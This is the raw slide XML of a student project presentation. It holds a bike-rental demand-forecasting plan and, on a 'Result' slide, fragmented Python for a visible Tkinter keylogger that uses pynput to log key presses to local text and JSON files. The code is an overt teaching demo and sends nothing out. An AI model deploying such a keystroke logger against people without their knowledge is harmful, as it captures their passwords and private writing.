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32207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IN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>FRANKLIN JOSHUA S </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KINGS ENGINEERING COLLEGE</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COMPUTER SCIENCE AND ENGINEERING</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Collection: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Gather historical data on bike rentals, including time, date, location, and other relevant factors.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Utilize real-time data sources, such as weather conditions, events, and holidays, to enhance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Preprocessing:</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Clean and preprocess the collected data to handle missing values, outliers, and inconsistencies.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Feature engineering to extract relevant features from the data that might impact bike demand.</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Machine Learning Algorithm:</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Implement a machine learning algorithm, such as a time-series forecasting model (e.g., ARIMA, SARIMA, or LSTM), to predict bike counts based on historical patterns.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Consider incorporating other factors like weather conditions, day of the week, and special events to improve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Deployment:</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Develop a user-friendly interface or application that provides real-time predictions for bike counts at different hours.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Deploy the solution on a scalable and reliable platform, considering factors like server infrastructure, response time, and user accessibility.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Evaluation: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Assess the model's performance using appropriate metrics such as Mean Absolute Error (MAE), Root Mean Squared Error (RMSE), or other relevant metrics.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Fine-tune the model based on feedback and continuous monitoring of prediction accuracy.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1200" b="1">
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>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endParaRPr lang="en-IN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0F0F0F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="305435" indent="-305435"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Library required to build the model</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="18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729866"/>
            <a:ext cx="11029616" cy="530296"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Result</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1346454" y="-7654081"/>
            <a:ext cx="4880610" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1135374" y="1260162"/>
            <a:ext cx="2956335" cy="5509200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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tk</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import *</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pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> import keyboard</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json</a:t>
            </a:r>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 []</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flag = False</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keys = ""</a:t>
            </a:r>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generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(key):</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with open('key_log.txt', "w+") as keys:</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keys.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(key)</a:t>
            </a:r>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with open('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>key_log.json</a:t>
            </a:r>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wb</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key_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>json.dumps</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).encode()</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key_log.write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a:t>
            </a:r>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on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(key):</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False:</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{'Pressed': f'{key}'}</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flag = True</a:t>
            </a:r>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{'Held': f'{key}'}</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on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(key):</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{'Released': f'{key}'}</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flag = False</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endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4409665" y="1348800"/>
            <a:ext cx="2956335" cy="4031873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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keys = keys + str(key)</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generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(str(keys))</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listener = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keyboard.Listener</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listener.start</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(text="Keylogger stopped.")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root = Tk()</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root.title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("Keylogger")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(anchor=CENTER)</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label.pack</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text="Start", command=</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start_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(side=LEFT)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text="Stop", command=</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 state='disabled')</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stop_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(side=RIGHT)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root.geometry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("250x250")</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root.mainloop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endParaRPr lang="en-IN" sz="800"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6275</Words>
  <Application>WPS Presentation</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>160</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91720</cp:lastModifiedBy>
  <cp:revision>30</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-26T16:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-23T13:31:14Z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ACEE098E898D49DC83041C95EC74FA9D_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.2.0.16731</vt:lpwstr>
  </property>
</Properties>
</file>